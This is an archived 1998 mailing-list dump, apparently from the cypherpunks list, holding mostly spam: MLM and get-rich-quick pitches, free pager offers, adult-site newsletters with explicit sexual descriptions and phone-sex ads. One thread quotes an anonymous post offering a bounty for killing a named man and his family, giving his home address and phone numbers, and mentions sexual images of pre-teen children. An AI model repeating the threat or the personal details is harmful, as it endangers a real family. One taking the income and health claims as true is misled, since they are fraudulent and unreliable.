<B>Mission:</B>	     To aggressively acquire steeply undervalued real estate properties
                       due to previous mismanagement or undercapitalization.   
<B>Management: </B>Senior executives with diverse experiences, including: 
                       Fortune 500 corporations, leading stock brokerage firms, 
                       real estate companies and national marketing.  
<B>Goals:</B>	           To increase assets to $10M by January 98 and $50M by mid-year  
<B>Address:</B>	     1401 Elm St., Ste. 1818, Dallas, TX  75202-2925
<B>Phone:</B>	           (214) 749-4600
<B>FAX:	</B>	     (214) 749-4608
<B>Internet:</B>	    www.remington-hall.com<B> </B> <FONT  COLOR="#0080ff" SIZE=3><B>
</FONT><FONT  COLOR="#000000" SIZE=3>E-Mail:</B>	         <B> InvestorRelations@remington-hall    <FONT  COLOR="#ffffff" SIZE=3>ll.com</FONT><FONT  COLOR="#0000ff" SIZE=3></B>
</FONT><FONT  COLOR="#000000" SIZE=3><B>Quote             </B>Yahoo! Remington-Hall<B> </B> <A HREF="www.remington-hall.com">
</A>
  <FONT  COLOR="#000000" SIZE=3>
</PRE></HTML>

</FONT><FONT  COLOR="#000000" SIZ





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 1qfiZZ5dK@k1notsee.com
Date: Wed, 14 Jan 1998 22:58:02 -0800 (PST)
To: electric@million22.com
Subject: Press Release
Message-ID: <GL9fc8y9a7o49>
MIME-Version: 1.0
Content-Type: text/plain


	ATTENTION ALL INTERNET USERS		PRESS RELEASE

BILLION DOLLAR COMPANY ANNOUNCES ENTRY INTO TRILLION DOLLAR TECHNOLOGY
MARKETS

You're obviously technology minded or you wouldn't be reading this right
now!

THE MARKETS

You're probably aware that deregulation of the $215 Billion Dollar
electricity market begins in 1998. Remember what happened when
long-distance deregulated? Companies like MCI and Sprint made billions
and became household names in a market 1/3 the size of electricity! And
electricity is only the tip of the iceberg.

An international powerhouse doing in excess of $1.5 Billion annually is
aggressively seeking entrepreneurs to participate in its launch into the
following markets:

	Electricity
	Internet Access
	Internet Commerce
	Long-Distance Telephone Service
	International Phone Service
	Cellular Service
	Paging
	Cable and Satellite Television
	Natural Gas
	Home Security Systems

We are offering you the opportunity to turn these expenxe centers into
profit centers and participate in the largest transfer of wealth in
history. IMAGINE GETTING PAID EVERY TIME SOMEONE GETS ON THE NET, BUYS
SOMETHING OFF THE NET, TURNS ON THE LIGHT, COOKS, MAKES A TELEPHONE
CALL, USES A CELLULAR OR PAGER, WATCHES CABLE OR SATELLITE TV OR USES A
HOME SECURITY SYSTEM! Recurring, ongoing income paid on services we all
use everyday already, except you can now earn a royalty on other
people's usage. You can also receive royalties on the usage of
businesses, large corporations, apartment buildings...anywhere these
services are used.

THE COMPANY

	Billion Dollar Company, completely debt-free
	Top-rated by Dun & Bradstreet, listed on NYSE
	"One of the 8 fastest growing companies in US history"-Success
Magazine
	Highest paying company in its industry

THE STRATEGY

To reach our goal of dominating all connections into the home/building
we will:

	Partner with Blue-Chip megacompanies in these industries
	Use our corporate buying power to negotiate favorable rates
	Offer these services in 1-year contracts to ensure your income
	Ultimately "Bundle" these services into ONE MONTHLY BILL for the
	ultimate in convenience while keeping attrition to a minimum

COMPENSATION

	We currently have over 500 people earning an average income of
$561,000 per year in markets that total $75 Billion annually--less
than 1/15 of the size of the markets we are positioning to enter.

INFORMATION

	We have set up a voice forum that you can call 24 hours per day and
get more information about this once-in-a-lifetime opportunity. Please
take 10-15 minutes and call:

				801-345-9614

	Then call me at 310-281-5500 so I can answer your questions and
provide further information.

	BEING FIRST IS GREAT--YOU NOW HAVE THE OPPORTUNITY TO BE BEFORE FIRST





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: PleaseSeeBelow@GreatPagersFor1998.com
Date: Wed, 14 Jan 1998 23:28:05 -0800 (PST)
To: WiseFolks@UwiseFolk.com
Subject: FREE Motorola Pagers!!!
Message-ID: <82315499_7790740>
MIME-Version: 1.0
Content-Type: text/plain



*********************************************************************
  - Remove from list information is after this important message -
*********************************************************************
                              *******


FREE MOTOROLA PAGER!!! Keep in touch with family, friends and the 
office with your own FREE PAGER. No Strings! No Credit Checks! No
Long Term Contracts to sign! Just Great Service and a FREE PAGER. 
Many styles and colors to choose from including the NEW MOTOROLA 
ADVISOR GOLD EMAIL PAGER AND THE NEW MOTOROLA TENOR VOICE PAGER!!
Also, find out how to get paid to give away FREE PAGERS. Unlimited
residual income! This is EXCITING!!! 

If interested, please respond  to chicklette@webtv.net with "Free 
Pager" in the subject line and we will provide you with the 
information you need to obtain your FREE PAGER.

******************************************************************
******************************************************************
TO BE REMOVED FROM OUR MAILING LIST, TYPE: Cartmore@ix.netcom.com
in the (TO:) area and (REMOVE) in the subject area of a new E-mail 
and send.
******************************************************************
******************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dr. Zeus" <zeus@alt.net>
Date: Wed, 14 Jan 1998 23:58:24 -0800 (PST)
To: freedom-knights@jetcafe.org
Subject: Chris Lewis's death?
In-Reply-To: <db07d071dcdf9a13e505c3d6c9dc7389@anon.efga.org>
Message-ID: <34BDC364.46C2@alt.net>
MIME-Version: 1.0
Content-Type: text/plain


Anonymous wrote:
> 
> I tried sending an anonymous test article to comp.org.cauce via the CRACKER
> remailer.  Sure enough, the Gypsie Jew Zorch forged a cancel for my article:
> 
> >From: scott@zorch.sf-bay.org (Scott Hazen Mueller)
> >Newsgroups: comp.org.cauce
> >Subject: cancelled posting
> >Date: 30 Dec 1997 13:25:04 -0500
> >Organization: At Home; Salida, CA
> >Lines: 26
> >Sender: johnl@iecc.com
> >Approved: comp.org.cauce@abuse.net
> >Message-ID: <EM0LFH.Bn3@zorch.SF-Bay.ORG>
> >Reply-To: scott@zorch.sf-bay.org
> >NNTP-Posting-Host: ivan.iecc.com
> >X-submission-address: comp-org-cauce@abuse.net
> >X-Authentication-Warning: orbit.hooked.net: Uzorch set sender to news@zorch.sf-bay.org using -f
> >X-Nntp-Posting-Host: localhost.sf-bay.org
> >Path: ...!iecc.com!iecc.com!not-for-mail
> >
> >I have issued a cancel for the following posting to comp.org.cauce.  Death
> >threats are serious business.
> >
> >Xref: zorch comp.org.cauce:378
> >Path: zorch!news.well.com!noos.hooked.net!204.156.128.20.MISMATCH!news1.best.com
> >!news.maxwell.syr.edu!news-peer.sprintlink.net!news-sea-19.sprintlink.net!news-i
> >n-west.sprintlink.net!news.sprintlink.net!Sprint!205.238.207.65!iecc.com!iecc.co
> >m!not-for-mail
> >From: Anonymous <anon@anon.efga.org>
> >Newsgroups: comp.org.cauce
> >Subject: CAUCE offers a $50,000 (canadian) reward for killing Chris Lewis, his w
> >ife, and the kid
> >Date: 30 Dec 1997 10:58:17 -0500
> >Organization: I.E.C.C., Trumansburg NY
> >Lines: 14
> >Sender: johnl@iecc.com
> >Approved: comp.org.cauce@abuse.net
> >Message-ID: <b8d6450efb8581fa6190e92216c92e16@anon.efga.org>
> >NNTP-Posting-Host: ivan.iecc.com
> >X-submission-address: comp-org-cauce@abuse.net
> >Comments: This message did not originate from the Sender address above.
> >        It was remailed automatically by anonymizing remailer software.
> >        Please report problems or inappropriate use to the
> >        remailer administrator at <admin@anon.efga.org>.
> 
> My cancelled Usenet article offered a reward for killing the spammer:
> 
> >CAUCE, the enforcement branch of the Internet administration, is dedicated to
> >exterminating all SPAMMERS by any means necessary. CAUCE wants Chris Lewis and
> >all other SPAMMERS dead, and will gladly pay the $50,000 (canadian) reward to
> >whomever KILLS Chris Lewis and his family, who reside in a suburb of Ottawa:
> >

I think we should leave the family out of this, and instead killing
Chris Lewis, just get him fired from Nortel


> >483 Vances Side Road
> >Dunrobin, Ontario K0A 1T0
> >CANADA
> >Home telephone: (613) 832-0541,
> >Office telephone: (613) 763-2935
> >
> >After you kill Chris Lewis and his family, please see http://www.cauce.org
> >for information on how to collect your CAUCE reward.
> 
> This is fucking censorship!  I'm putting the notice of the CAUCE reward on my
> web home page at http://www.panix.com/~guy, right next to the pictures of the
> pre-teen kids screwing.  Fuck you, Zorch, you're next after C, P, and G Lewis.
> 
> ---guy

Just6 who is this "guy?"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eureka@eureka.abc-web.com
Date: Thu, 15 Jan 1998 02:13:28 -0800 (PST)
To: All Eureka! Subscribers: ;
Subject: Eureka! Thu Jan 15 '98
Message-ID: <19980115082051.29357.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


Welcome to Thursday's issue of Eureka!

FRESHTEENS!
Is there no end to it? Yet again we have succeeded in obtai-
ning a FREE one week trial,  for all Eureka!  subscribers at
another of the net's finest websites. Freshteens offers over
200 video feeds, hot live,  sex shows,  hard XXX movies, hot
XXX stories,  exclusive Texas Teens, and a comprehensive gay
area too. You need a credit card to verify you are an adult,
but will not be charged for your FREE membership. Excellent!
Freshteens ........... http://www.freshteens.com/cproot/1217

PLEASE VISIT THIS FINE EUREKA! PARTNER SITE
Free Gay and Straight Hardcore Video, Pix, & Games
http://www.porndaddy.com
Always Free content for our surfers We Beat most pay sites.
Video, Pix, Games, and Links to Quality Pay Sites that offer
Free trial memberships. Hurry On Over :^)

ALTRAVISTA
Click on the Babes link.  Another  window will open and your 
in. Here you will find amateur  babes, creamy blow jobs, hot
babes, fuck action  and  asian  pussy.  Definitely worth the
trip  from any  browser.  Nice tan  lines on  the hot babes!
Altravista ............ http://www.altravista.com/index2.htm

SEX YOU
This website features a lot of great images! Girls on girls,
black haired beauties, big breast babes licking pussy, and a
MPEG video of a facial.  There  are about 100 different pix! 
What more do you want for  free!  Grab  your mouse and go to
it. ..................... http://www.arg-inc.com/sexwarn.htm

THE FACTORY
Well, somebody has been  working  hard  down at the factory,
and they have the goods to prove  it. They offer 20 free pix
for  you to see. Group  sex,  anal  sex, double dicking, lip
sreading. What are you waiting  for? Check this website out,
it is hot! .................. http://www.comdigi2.com/xxdeb/

PAYDIRT
There is a ton of links to pick from. Find the one that says
100 free pixx. Click on that one  and you will find a lot of
great images. In addition they have  added a joke with every
photo.  Lots of pussy,  fucking and sucking pix.  Cruise by.
Paydirt ...................... http://www.paydirt.inter.net/

FREE STREAMING VIDEO
Please note that most of these feeds require a Netscape bro-
wser in order to successfully view them. Unfortunately Micr-
osoft's browser does not have all the features of Netscape's
yet.  However, many of the feeds use the RealPlayer and will
work in most browsers.  If you do not have Netscape and want
a free copy click here ... http://www.netscape.com/download/
Max Hardcore ......... http://207.240.169.121/max/start.html

CHAT WITH OTHER READERS
This chat is growing fast, and already there are a number of
regulars  you will meet most days.  It's good to see Eureka!
readers interacting with each other and having a great time!
Adult/Sex Chat .................. http://137.39.63.229/chat/
General/Fun Chat ........ http://137.39.63.229/chat/funchat/

THE BEST PHONE SEX
NEW!!!! LD Call only! - Live Hot Girls!!!!....1-664-410-3912
LIVE: 1-on-1, 2-on-1, Group, Dateline.........1-800-644-8779
FREE: Live 1-on-1 (international call only)....011-678-77416

AMATEUR SITE OF THE DAY
ABIGAIL: A hot babe who loves  dogs, and believe me you will
wish you could lick her. Abigail  has taken the time to post
some Hi-Rez pictures,  they  are  HUGE.  She  also  has some
steamy girl/girl pictures!
............................ http://amateurindex.com/eureka/

EROTIC STORY SITE OF THE DAY
StinkyBoy's Sex Stories: Stinky gives  you a fresh selection
of sex stories in 3  nasty categories: Gang Bangs, Lesbians,
and B & D. ............... http://www.stinkyboy.com/stories/

DAILY CARTOON ........... http://www.erosinorbit.com/eureka/

ADULT STAR PIC OF THE DAY
Every day  we bring you an exclusive  choice pic of a famous
adult porn star.  And we must tell you - these pix are abso-
luletly brilliant! .... http://www.xxxadultstars.com/eureka/

GAYEUREKA!
The gay  newsletter is now  available.  You can get it here!
Gay Eureka! ........... http://eureka.abc-web.com/gayeureka/

EUREKA! TRANSLATIONS
As well as English you can now choose any of these languages
DEUTSCH ....... http://eureka.abc-web.com/eureka/deutsch.htm
ESPAOL ....... http://eureka.abc-web.com/eureka/espanol.htm
FRANAIS ..... http://eureka.abc-web.com/eureka/francais.htm
ITALIANO ..... http://eureka.abc-web.com/eureka/italiano.htm
PORTUGUESE . http://eureka.abc-web.com/eureka/portuguese.htm

TODAY'S FREE PIX
Pic  1 ........................... http://137.39.63.229/?150
Pic  2 ........................... http://137.39.63.229/?151
Pic  3 ........................... http://137.39.63.229/?152
Pic  4 ........................... http://137.39.63.229/?153
Pic  5 ........................... http://137.39.63.229/?154
Pic  6 ........................... http://137.39.63.229/?155
Pic  7 ........................... http://137.39.63.229/?156
Pic  8 ........................... http://137.39.63.229/?157
Pic  9 ........................... http://137.39.63.229/?158
Pic 10 ........................... http://137.39.63.229/?159

============================================================
TO UNSUBSCRIBE FROM THIS NEWSLETTER,  USE THE REPLY FUNCTION
IN YOUR EMAIL PROGRAM, AND SEND THIS EMAIL RIGHT BACK TO US.
============================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 777e42@ia.com.hk (nz)
Date: Thu, 15 Jan 1998 07:09:51 -0800 (PST)
To: 777e42@ia.com.hk
Subject: NET-ZINE
Message-ID: <199801163816BAA40525@post.uu.net>
MIME-Version: 1.0
Content-Type: text/plain


                                                                                               NET-ZINE - The following is sent to you as a special offering of the most exciting offers anywhere on the internet. These offers will only be made once and we will not contact you again. If you are not interested or have changed your mind we apologize for any inconvenience.
+++++++++++++++++
+++++++++++++++++

Make THOUSANDS a week and do absolutely NOTHING except pass out this 800 number with your code number. NO SELLING ! NO HASSLE! A NO BRAINER ! ! This company does the selling for you, closes the deal, and sends you money every Friday. Don't miss this opportunity ! Call 1-800-811-2141 Code #46812
-------------------------------
Looking for unheard of DISCOUNTED prices for magazines? Our nearly 550 Magazine Subscriptions are up to 80% OFF our already discounted prices !!! We welcome USA, Canadian and Foreign customers alike to buy their favorite magazines. http://aladdinslamp.com or email us: bestprice@kktv.com
--------------------------------
GUARANTEED PROFIT ! The most Powerful home based money maker in the WORLD! $10,000 plus per month probable. The ONLY true Money back Guarantee ! AMM's highly professional organization does all the work for you ! Anyone can succeed immediately ! Call Now-TOLL FREE ! 1-888-248-1794 use control # SM3371 http://www.dreambiz.com
_____________________
THE MOST INCREDIBLE PRODUCT EVER METAMORPHOSIS (TM) !
PATENTED FAT BURNER-SUPER ENERGIZER
FOR YOUR SPECIAL FREE OFFER
Visit: http://www.goodbiz.com/jdp/index.html
-----------------------------
RETIRE ON $463,104/YEAR OFF-SHORE INCOME PLUS in less than 2 years. Solid financial program. Info: www.wealthbuildersclub.com-FOD 415 273-3999 Conferences:423 362-4150 Pin #2201 M-F 9PM EST Fax Global InfoNet 215 862-0804 for more info.
-----------------------------
Reveal Ancient Asian secret, just a few sets of simple exercises, help your body establish a system to consume body fat directly. Mysterious but effective, lose 1-3 lbs a day, good health and energy. it works! Everybody can learn easily. One program, benefit all your life, all family and friends. have a fit and healthy body is so easy! Just $14.95! P.O. Box 430965, Miami, Fl, 33243
---------------------------------------
WORK P/T OR F/T FOR JUST 2 YEARS THEN RETIRE WITH A HEALTHY 6-FIGURE ANNUAL INCOME, VIRTUALLY TAX-FREE! Info:www.wealthbuilders.com/ F.O.D. 415 273-3999 Conferences 423 362-4150 Pin#2201 M-W-F-\9pm/Tu-Th 8p.m. EST Fast sign up call Michael 215 862 5690 (9-5 EST)
____________________________

NEW BOOKLET SAVES YOU  MONEY !! Licensed master plumber shares his secrets with you. An informative 10-page booklet that shows you the secrets of repairing that leaky toilet.(Average cost for a plumber $65.00) Send $5.00 to James McCarter 912 Millican Grove rd. Sevierville, TN 37876. More booklets avail soon--mccarter@mail.tds.net
-----------------------------
Subject: Insanity
Doing the same thing over and over again expecting different results. Want another job, DON'T CALL. Want a career and to be paid what you're worth while making a positive impact on saving our planet? We are looking to expand the NJ & Tristate area. Serious inquiries call Robin 201-683-0152
-----------------
MAKE MORE MONEY THAN YOU CAN SPEND!
Obtain US Gold Coins for 40 cents on the dollar!
Turn $50. into thousands within weeks! Earn over-rides plus BIG residual income. Winning Team! Details: 800-662-0768
------------------
Stunningly Gorgeous Timeless Fine Jewelry at Exceptional Prices!
Give a gift that your loved one will delight in receiving, treasure forever, and make them the envy of everyone. Diamonds, Pearls and Precious Gems in Gold and Platinum. FREE Drawing. A MUST SEE. Visit today at: http://www.galaxymall.com/market/jewelry.
------------------------
Send for our 300 page full color catalog and get a $10.00 certificate. Major charge cards accepted over a 1-800 number that is open 24 hours a day or send it in the mail. Internet catalog ordering available. Send $5.00 to: T&P Enterprises 2327 Parkland Ave., Dayton, Ohio . Income opportunity available also.
--------------------------
Restores! Greatest Scientific Breakthrough Product Ever Created! A Stress Damage Preventer, Depression Reliever, Alcohol Compulsion Reliever, ADD/ADHD Controller, Weight Loss Enhance and Brain Food Recorded message: 1-800-779-0895; Phone: 307-686-7452; email-shirbell@vcn.com http://www.freeyellow.com/members/shirbell/
-------------------------------------
CRIITICALWEAR CUSTOM EMBROIDERY
SPECIALIZING IN MEDICAL AND EMBROIDERY SERVICES AGENCIES
T-SHIRTS-POLO SHIRTS-SWEATSHIRTS-CAPS-JACKETS
LOW-LOW PRICES LOW LOW MINIMUMS, ADD A NEW LOOK TO YOUR ORGANIZATION IN 1998
CALL NOW FOR YOUR FREE  CATALOG TOLL FREE 1-800-453-1313
____________________________
BUY A $80,000 HOUSE FOR $1,000!
Learn how to buy real estate for pennies on the dollar.
Invest a few hours each week and earn a full time income.
Step-by-step guide makes it easy for you to make money !
100% No Risk Guarantee ! www.erep.com/realestate.htm
-------------------------------------
A NEW SYSTEM THAT MAKES 
ALL YOUR DREAMS COME TRUE
With our company's easy to follow plan, YOU WILL BE A MILLIONAIRE IN ONE MONTH! by working 1 hr daily at home or we refund all your money plus SEND YOU A CHECK FOR $2000 just for participating. For more info. send you name and address plus $1. for postage to :REC, Inc. 774 HAMILTON AVE., WATERBURY, CT 06706
--------------------------------------
You are about to make at least $50,000. in less than 90 days! This is a MONEY-MAKING PHENOMENON! This is a legitimate LEGAL money-making opportunity. Receive cash through your mailbox with minimal investment. For more information E-mail me at LCS12127@AOL.COM
--------------------------------------
DO THIS FOR 15 MINUTES BEFORE YOU RETIRE AND GAIN THE EFFECTS OF 3 EXTRA HOURS OF SLEEP ! Send for this e-report for just $5.00 w/your email address to Discovery NET 2436 Woodchuck Way, Sandy, UT, USA, 84093-2742
_____________________
SECRET FAMILY RECIPE HANDED DOWN OVER THE YEARS. NO FAIL PERFECT FLAKY PIE CRUST EVERY TIME. SEND SASE $4 TO : 9826 KEITH CT, WINDSOR, CA 95492
-----------------------
Unique holiday gift- Joy of Bocce-1st bocce instructional book in USA Pub. dist. by Masters Press- for the backyard player or tournament vet. Rules-backyard & tourney-strategy-equipment-court construction. Send $13 + ($2 S&H $1ea add book) to Striker PO Box 608 Methuen, MA 01844 see www.worldprofit.com/mastrik.htm 
----------------------------
How To Buy Anything From The Government Dirt Cheap
Complete manual only $9.95, send check or money order to : Cyber Marketing, P.O. Box 1503, E. Lansing, MI, 
_______________

SOFTWARE GIVE-AWAY !
Software that's designed to make money. It is legal, and really easy to use. Excellent E-mail address and lead generator. You can use the leads for building other businesses, too. The software is free in a DEMO type. If you like what you see, than you can order the code to unlock it. Write for more info to SMihaly@juno.com
_____________________________________
Beeper service as low as $3.99 per month! Motorola Beeper & FREE year of service $60.00 ! Motorola Bravo Flex & 1 Year $99.97. Call today for other specials visit www.nybeeper.com
--------------------------------
ONCE IN A LIFETIME HOME BUSINESS OPPORTUNITY with exploding new MLM program in 20-billion $ market No sign-up fee as a Distributor for the phenomenal new earth Smart (R) LAUNDRY CD (TM) Replaces detergents softeners & static sheets. No more chemicals to ruin your clothes and pollute the environment. e-mail ktripp@infolite.com
-------------------------------

This is what he told me.
"I have been in 'GROWTH' for 11 months now. When I first started I never knew how to send tons of email, so it took me about 7 months to make the first MILLION. Since then I have learned how to send tons of email, and today I'm generating over a MILLION DOLLARS in 4 months, sometimes even in less !!!! Anyone can do it. ARE YOU INTERESTED? For info email wlturn@aol.com
______________________

Hi!
I thought you might be interested in a FREE 5 page web site! No strings, just a FREE 5 page website! Just e-mail to xcellp@freeyellow.com and ask for FREE Web Page.
-------------------------------

Join our Circle of  FRIENDS Club- Small membership fee-endless rewards. Visit our web page at HTTP://www.Tulsa.Oklahoma.net/~CFC
Thank You
____________________

"QUICK CASH"- Earn fast cash through simple advertising. You won't get rich overnight, but you will be pleased with the fast results with this program. Send $10.00 cash, check or money order (checks take 6 days to clear) to 
Opportunities Unlimited, PO Box 54, VALE, NC 28168-0054 for info pack.
________________________________

Hot Opportunity! Join us as Distributors for Changes International Plan: Compensation Plan 1st Level 15% 2nd Level 45% A 1,2,3 Step Plan to follow. Sign up fee $10.95 Email name & address to mfuller@tfs.net Website: http://www.freeyellow.com/members/dadmarket
________________________

Dental Doctor Needle ease machine eliminates Needlestick Injury. Electronically disintegrates the steel needle. Small, Portable, Rechargeable, $299 U.S. + $20 S&H VISA Order@1-800-249-7197 or 1-403-271-1094 Calgary, AB Canada, AB Canada. Email ben@belzona-western-ltd.com
________________________

BECOME A DIPLOMAT-
40 Counselor and Honorary Consul positions to fill by year-end. Full diplomatic credentials and Diplomatic passport provided. We (EXPAT WORLD) have been asked by the Counselor to the United Nations and Honorary Consul of Atlanta, Georgia for a small, independent nation to find 40 suitable candidates. Positions require a donation to the government mission. Full detail email: eugeneV1@singnet.com.sg--subject box:DIP
____________

PRE-LAUNCH FREE SIGN-UP! Your own homepage on the world wide web. Advertise to the world. No computer needed. $30. Fast start bonuses paid daily! Homepages are limited to 150 words or less. $40. monthly hosting fee. Pays 5 levels! $10 on level 1 $5 on levels 2 thru 5. Build your downline before the kickoff on Dec.1st,1997 Send $1 P&H for distributor kit. More detail at :http://www.curtrem.com/prelaunch.htm or email info@curtrem.com
-----------------
Your Best Bet, For Your 'SPECIAL INTEREST" Instructional Video's and CD-Rom's Now at Web-Site: www.totalmarketing.com/gguidpro Or try Http://www.totalmarketing.com/an/ppage.pl/ chome.html/qei2679.51828  "Your Interest is Our Business "
_______________

For ONLY $95/MONTH Get Your Own Virtual Office/Branch/Address. Expand Your MARKET, create a business base in W.Palm Beach FL. Add a prestigious downtown W. Palm beach location to your ltr. head. We answer your tel# professionally, fwd. your mail and much more!!! Act Now- GICS Exec. Suite: gics@irean.com, http://www.irean.co

=========================

$$$ CLASSIFIED Ads can Load Your Mailbox with CASH $$$- 

Learn how to place your ad in several publications at one time. 
Command nationwide attention for one low price-- anyone can start making money right away with this information.

This INSIDE SECRET is used by all the experts and is taught in many seminars. you can pay $100.00's for this special list or you can send us a $12.95 Money Order and we'll email it to you right away !

Why wait? If you want to start making money now, grab a pen and order the list..... You'll be glad you did !

O.K. I want to Start making CASH PROFITS Right Away with Classified Ads. Email the Special network List to (YOUR EMAIL ADDRESS HERE_______). I have included a Money Order for $12.95. Send order and payment to:
Oxford 
2899 Agoura Rd, Suite 700
Westlake Vlg, CA 91361
-----------------------------
Did you know that you--
NEVER NEED TO CHANGE YOUR EMAIL ADDRESS AGAIN. There are a variety of FREE Services where you can get an email address and keep it.....even when you move ! Simply go to any search engine  and type in FREE email service !

HAVE A GREAT WEEK !
All Rights Reserved 1998





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "http://www.musicblvd.com/" <manager@musicblvd.com>
Date: Fri, 16 Jan 1998 01:02:28 -0800 (PST)
To: musicblvd@sparklist.com
Subject: Music Boulevard Storewide Sale
Message-ID: <3.0.32.19980115122621.007dbd10@mail.sparknet.net>
MIME-Version: 1.0
Content-Type: text/plain



Dear Music Boulevard Customer,
 
Happy New Year from Music Boulevard!  Ring in 1998 on the right note,
with new music!  Through January 26th we've lowered prices on every CD,
cassette, video and T-shirt in our catalog of over 200,000 items --
our entire store is on sale!  Search for your most-wanted recordings or
refer to our comprehensive Buyer's Guide (created by Music Boulevard's 
staff of music experts) to find essential albums in every musical genre 
and style, from Surf and Garage Rock to New Orleans Jazz to Reggae to 
20th Century Classical music.  Follow the link below to go to our Buyer's 
Guide...

http://www.musicblvd.com/cgi-bin/tw/1462_0_/mb2/live/mrkt/specials.txt
 

$1 U.S. SHIPPING!
Extra, Extra! Due to enthusiastic customer response, we've extended
our shipping sale! Through the end of January, the shipping charge 
for U.S. orders is just $1 for unlimited items. With our unbeatable 
prices and shipping rates, expanding your music collection in '98 is 
one New Year's resolution you just can't break!
 
EARN FREE CDS!
How many CDs did you buy in '97? Our Frequent Buyer's Club members
earn store credit for a free CD after each tenth item purchased on 
Music Boulevard.  If you haven't already joined the club, don't delay 
- starting earning points towards your first free CD today! 
  
THE VOTES ARE IN...
And the winner is...Music Boulevard! We've been named the official
online store for the 40TH ANNUAL GRAMMY AWARDS!  For the best recordings 
and performances of 1997, look no further than our comprehensive "Guide 
to the Grammy Nominees", including nominees in over 90 categories, audio
clips, cover art, and much more.  All nominated albums -- from outstanding
artists Paula Cole, Babyface, Hanson, and many other top artists -- will 
be sale-priced through the Grammy Awards Ceremony on February 25th.
After the 25th, revisit the Guide for a complete list of the winners and 
special savings on the best of the best! Just follow the URL below...

http://www.musicblvd.com/cgi-bin/tw/1462_0_/mb2/live/mrkt/grammyguide/genera
l.txt


NEW AND NOTEWORTHY
Music Boulevard keeps you informed of the latest and greatest new
music! The stellar soundtrack to 'Great Expectations' is highlighted by 
brand new songs from Tori Amos, Chris Cornell of Soundgarden, and Scott 
Weiland.  Just released -- Ben Folds Five's 'Naked Baby Photos,' a 
collection of 17 of the quirky pop group's best rare, live, and unreleased 
songs.  And at the top of the music charts, the soundtrack to the epic 
romance 'Titanic' features the music of legendary film soundtrack composer 
James Horner as well as the Celine Dion's beautiful performance of the love 
theme "My Heart Will Go On." 
 
GET THEM BEFORE THEY'RE HOT!
Visit Music Boulevard today to pre-order tomorrow's biggest hits! On
January 27th, keyboard virtuoso John Tesh unveils his latest
full-length album of lush, soothing New Age compositions.  Also on 
the 27th, the master of English Jungle techno, Goldie, returns with his 
long-awaited second album, the double-CD 'Saturnzreturn.'  On February 3rd,
Seattle supergroup Pearl Jam makes a comeback with their fifth and finest 
studio album yet, 'Yield,' featuring the hit single "Given To Fly."  Advance 
order these much-awaited new albums today and have them delivered to your 
doorstep on release date!
 
Thanks for shopping Music Boulevard!
 
The Music Boulevard Staff
 
TO UNSUBSCRIBE
To unsubscribe from this mailing list, send an Email to:
remove-musicblvd@sparklist.com
and you will be automatically removed from this list.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: freecalls4u@28399.com
Date: Fri, 16 Jan 1998 06:02:29 -0800 (PST)
To: phasl@header.net.edu
Subject: Talk Is Cheap.....AND Fun!
Message-ID: <563298745123698563666@header.net.edu>
MIME-Version: 1.0
Content-Type: text/plain


                          NO 900 #.....NO Credit Cards

                         Just Pick Up The Phone & CALL!

 
                     Talk to our SEXY & HOT, young girls!
                        They will talk about ANYTHING!
                               24 Hours A Day!
    

   NO Charge For The Girl's Services!  You pay for the long distance charges 
                      (as little as .30 cents a minute)
  
  
           Economy Plan: Call us as a group and split the charges!
    
                                     SHY.......
 Then call and just listen.  You'll be amazed at some of the wild fantasies!    

Why pay for expensive 900 numbers, when you can talk to our hot and sexy babes for 
                       as little as .30 cents per minute.

This is a LIMITED TIME OFFER to introduce our girls and our GREAT new service.

                            Don't delay, call today!

    
                                 011-592-1773
                                  (24 hrs.)    



                  You MUST be 21 years old to participate.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eureka@eureka.abc-web.com
Date: Fri, 16 Jan 1998 04:52:15 -0800 (PST)
To: All Eureka! Subscribers: ;
Subject: Eureka! Fri Jan 16 '98
Message-ID: <19980116083206.5871.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


Welcome to Friday's issue of Eureka!

PLAYGAL
This is truly a breathtaking site. Well-designed and easy to
use with  excellent content.  The tour alone has hotter porn
than many other 'free' sites - go see it now. It's explicit,
comprehensive and top quality.  There are 2,000  video feeds
online, free live fucking with sound, 10,000 erotic stories,
1,000s of top quality pix, adult and arcade games, real ama-
teur competitions and much more. Click now and be astounded!
Playgal .... http://www.playgal.com/playgal/banner_abc1.html

PLEASE VISIT THIS FINE EUREKA! PARTNER SITE
Persian Kitty's Adult Links
http://www.persiankitty.com/pk.html
The #1 most visted adult links site on the Web.  Persian
Kitty's is now in it's 3rd year! Updated twice each day.
Plus the Purrfect Pose and the Desktop Image of the Week!

PLUMPERLAND
Fat chicks with big  hooters  and  pretty faces. Interesting
mix here. Some dressed like police  and bent over showing us
their goods. There are  also  some  links  here to other big
girl websites if you are so  inclined. Big girls need loving
too! ...................... http://www.ioservices.net/plump/

BIGKNOCKERS
It's a tit zone and a  half!  It's udder maddness! The boobs 
are big and the babes look  good.  This is a great site with
hardly no distracting graphics.  Just  a real easy thumbnail
area with lots of free pix.  This  is a must surf for anyone
who love breasts.  I gotta go  I'm getting thirsty for milk!
Bigknockers ....... http://www.bigknockers.com/free/free.htm

TITS OF THE WEEK
OK, this is a paysite, but at the door they have three great
sets of hooters free for  you  to enjoy viewing. These alone
are worth the modem hop. If  you  have seen one you have not 
seen them all. Take a  look  at  her  nipples! Cruise by and
see! ............................... http://www.towview.com/

OLDER BROADS WITH HORNY BODS
Hey, you will be older someday.  Here  is  a chance to get a 
peek at the future. These ladies  have  guts to stand up and
be seen! Some are not too bad.  A  few will scare you out of
your computer  chair  and leave  you running  in the street!
Older Broads ........ http://lisanne.com/obroads/ladies1.htm

FREE STREAMING VIDEO
Please note that most of these feeds require a Netscape bro-
wser in order to successfully view them. Unfortunately Micr-
osoft's browser does not have all the features of Netscape's
yet.  However, many of the feeds use the RealPlayer and will
work in most browsers.  If you do not have Netscape and want
a free copy click here ... http://www.netscape.com/download/
The hardcore channels .. http://www.EroticPleasures.net/xxx/

CHAT WITH OTHER READERS
